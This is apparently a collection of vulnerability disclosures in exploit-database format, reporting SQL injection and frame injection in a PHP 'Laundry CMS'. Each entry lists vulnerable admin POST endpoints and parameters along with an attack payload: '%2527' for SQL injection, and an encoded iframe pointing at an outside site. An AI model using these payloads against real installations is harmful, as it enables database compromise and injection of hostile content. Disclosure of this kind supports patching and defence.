1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
=========================================================================================== # Exploit Title: Laundry CMS cloth_code SQL Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - SQLi # Parameters : cloth_code, cloth_name # Attack Pattern : %2527 # POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Laundry CMS Multiple SQL Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - SQLi # Parameters : last_name, password, email, phone, first_name, status, join_date, address, # Attack Pattern : %2527 # POST Method : http://localhost/laundry/index.php/admin/customer_crud/create =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Laundry CMS Multiple SQL Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - SQLi # Parameters : last_name, password, email, phone, first_name, status, join_date, address, gender # Attack Pattern : %2527 # POST Method : http://localhost/laundry/index.php/admin/employee_crud/new =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Laundry CMS expse_code SQL Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - SQLi # Parameters : expse_code, expse_type, expse_id # Attack Pattern : %2527 # POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Laundry CMS service_code SQL Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - SQLi # Parameters : service_code, service_name # Attack Pattern : %2527 # POST Method : http://localhost/laundry/index.php/admin/service_crud/create =========================================================================================== =========================================================================================== # Exploit Title: Laundry CMS Multiple Frame Inj. # Dork: N/A # Date: 09-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://laundry.rpcits.co.in/ # Software Link: https://sourceforge.net/projects/laundry/ # Version: New # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: The Laundry Management Application is a very simple and Online Services with mobile and computer friendly themes development. =========================================================================================== # POC - Frame Inj. # Parameters : cloth_name, service_name, expse_type # Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e # POST Method : http://localhost/laundry/index.php/admin/service_crud/create =========================================================================================== |